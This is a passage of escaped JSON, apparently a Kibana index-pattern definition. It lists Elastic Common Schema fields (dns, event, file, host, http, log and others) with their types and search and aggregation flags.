le\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.ttl\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.header_flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.op_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.subdomain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.resolved_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.response_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.accessed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.attributes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.ctime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.device\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.drive_letter\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.gid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.group\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.inode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mime_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mtime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.owner\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.target_path\"}}},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.uid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.full_name\"}}},{\"count\":0,\"name\":\"host.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.name\"}}},{\"count\":0,\"name\":\"http.request.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.request.body.content\"}}},{\"count\":0,\"name\":\"http.request.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.method\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.referrer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.response.body.content\"}}},{\"count\":0,\"name\":\"http.response.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.status_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[